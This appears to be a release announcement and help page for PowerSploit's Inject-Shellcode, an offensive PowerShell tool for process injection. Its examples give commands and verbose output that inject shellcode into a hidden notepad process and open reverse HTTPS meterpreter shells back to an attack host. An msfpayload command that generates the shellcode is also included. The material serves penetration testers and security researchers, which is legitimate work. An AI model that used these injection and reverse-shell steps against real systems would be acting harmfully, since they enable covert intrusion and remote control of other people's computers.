PowerSploit - Inject-Shellcode Update

• Dramatically simplified parameters. Removed redundancies and named parameter sets more appropriately

• Added 'Shellcode' parameter. Now, you can optionally specify shellcode as a byte array rather than having to copy and paste shellcode into the $Shellcode32 and/or $Shellcode64 variables

• Added 'Payload' parameter. Naming is now consistant with Metasploit payloads. Currently, only 'windows/meterpreter/reverse_http' and 'windows/meterpreter/reverse_https' payloads are supported.

• Inject-Shellcode will now prompt the user to continue the 'dangerous' action unless the -Force switch is provided. Hopefully, this will prevent some people from carrying out stupid/regrettable actions.

• Added the 'ListMetasploitPayloads' switch to display the Metasploit payloads supported by Inject-Shellcode

• Added UserAgent parameter to help documentation
• Code is much more readable now
• Changed internal helper functions to 'local' scope
• Now using proper error handling versus Write-Warning statements
• Added a subtle warning to the built-in shellcode...

NAME<br>    Inject-Shellcode<br>   <br>SYNOPSIS<br>    Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.<br>   <br>    PowerSploit Module - Inject-Shellcode<br>    Author: Matthew Graeber (@mattifestation)<br>    License: BSD 3-Clause<br>   <br>SYNTAX<br>    Inject-Shellcode [-ProcessID <uint16>] [-Shellcode <byte>] [-Force]<br>   <br>    Inject-Shellcode [-ProcessID <uint16>] [-Payload <string>] -Lhost <string> -Lport <int32> [-UserAgent <string>] [-Force]<br>   <br>    Inject-Shellcode [-ProcessID <uint16>] [-ListMetasploitPayloads] [-Force]<br>   <br>   <br>DESCRIPTION<br>    Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre<br>   <br>    PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):<br>   <br>    msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-<br>   <br>    Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.<br><br>PARAMETERS<br>    -ProcessID <uint16><br>        Process ID of the process you want to inject shellcode into.<br>       <br>        Required?                    false<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br>       <br>    -Shellcode <byte><br>        Specifies an optional shellcode passed in as a byte array<br>       <br>        Required?                    false<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br>       <br>    -Payload <string><br>        Specifies the metasploit payload to use. Currently, only 'windows/meterpreter/reverse_http' and 'windows/meterpreter/reverse_https' payloads are supported.<br>       <br>        Required?                    false<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br>       <br>    -ListMetasploitPayloads [<switchparameter>]<br>        Lists all of the available Metasploit payloads that Inject-Shellcode supports<br>       <br>        Required?                    false<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br>       <br>    -Lhost <string><br>        Specifies the IP address of the attack machine waiting to receive the reverse shell<br>       <br>        Required?                    true<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br>       <br>    -Lport <int32><br>        Specifies the port of the attack machine waiting to receive the reverse shell<br>       <br>        Required?                    true<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br>       <br>    -UserAgent <string><br>        Optionally specifies the user agent to use when using meterpreter http or https payloads<br>       <br>        Required?                    false<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br>       <br>    -Force [<switchparameter>]<br>        Injects shellcode without prompting for confirmation. By default, Inject-Shellcode prompts for confirmation before performing any malicious act.<br>       <br>        Required?                    false<br>        Position?                    named<br>        Default value               <br>        Accept pipeline input?       false<br>        Accept wildcard characters? <br><br>NOTES<br>   <br>    Use the '-Verbose' option to print detailed information.<br>       <br>    Place your generated shellcode in $Shellcode32 and $Shellcode64 variables or pass it in as a byte array via the '-Shellcode' parameter<br>       <br>    Big thanks to Oisin (x0n) Grehan (@oising) for answering all my obscure questions at the drop of a hat - http://www.nivot.org/<br>   <br>    -------------------------- EXAMPLE 1 --------------------------<br>   <br>    C:\PS> Inject-Shellcode -ProcessId 4274<br>   <br>    Description<br>    -----------<br>    Inject shellcode into process ID 4274.<br>   <br>   <br>    -------------------------- EXAMPLE 2 --------------------------<br>   <br>    C:\PS> Inject-Shellcode<br>   <br>    Description<br>    -----------<br>    Inject shellcode into the running instance of PowerShell.<br><br>   <br>    -------------------------- EXAMPLE 3 --------------------------<br>   <br>    C:\PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden<br>    C:\PS> $Proc = Get-Process notepad<br>    C:\PS> Inject-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbose<br>   <br>    VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM<br>    VERBOSE: Injecting shellcode into PID: 4004<br>    VERBOSE: Injecting into a Wow64 process.<br>    VERBOSE: Using 32-bit shellcode.<br>    VERBOSE: Shellcode memory reserved at 0x03BE0000<br>    VERBOSE: Emitting 32-bit assembly call stub.<br>    VERBOSE: Thread call stub memory reserved at 0x001B0000<br>    VERBOSE: Shellcode injection complete!<br>   <br>    Description<br>    -----------<br>    Establishes a reverse https meterpreter payload from within the hidden notepad process. A multi-handler was set up<br>    with the following options:<br>   <br>    Payload options (windows/meterpreter/reverse_https):<br>   <br>    Name      Current Setting  Required  Description<br>    ----      ---------------  --------  -----------<br>    EXITFUNC  thread           yes       Exit technique: seh, thread, process, none<br>    LHOST     192.168.30.129   yes       The local listener hostname<br>    LPORT     443              yes       The local listener port<br><br>   <br>    -------------------------- EXAMPLE 4 --------------------------<br>   <br>    C:\PS> Inject-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80<br>   <br>    Description<br>    -----------<br>    Establishes a reverse http meterpreter payload from within the running PwerShell process. A multi-handler was set up<br>    with the following options:<br>   <br>    Payload options (windows/meterpreter/reverse_http):<br>   <br>    Name      Current Setting  Required  Description<br>    ----      ---------------  --------  -----------<br>    EXITFUNC  thread           yes       Exit technique: seh, thread, process, none<br>    LHOST     192.168.30.129   yes       The local listener hostname<br>    LPORT     80               yes       The local listener port<br><br>   <br>    -------------------------- EXAMPLE 5 --------------------------<br>   <br>    C:\PS> Inject-Shellcode -Shellcode @(0x90,0x90,0xC3)<br>   <br>    Description<br>    -----------<br>    Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)<br>    Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit!<br>   <br>   <br>    -------------------------- EXAMPLE 6 --------------------------<br>   <br>    C:\PS> Inject-Shellcode -ListMetasploitPayloads<br>   <br>    Payloads<br>    --------<br>    windows/meterpreter/reverse_http<br>    windows/meterpreter/reverse_https</switchparameter></string></int32></string></switchparameter></string></byte></uint16></uint16></string></int32></string></string></uint16></byte></uint16>

Enjoy and let me know if you have any suggestions for improvements!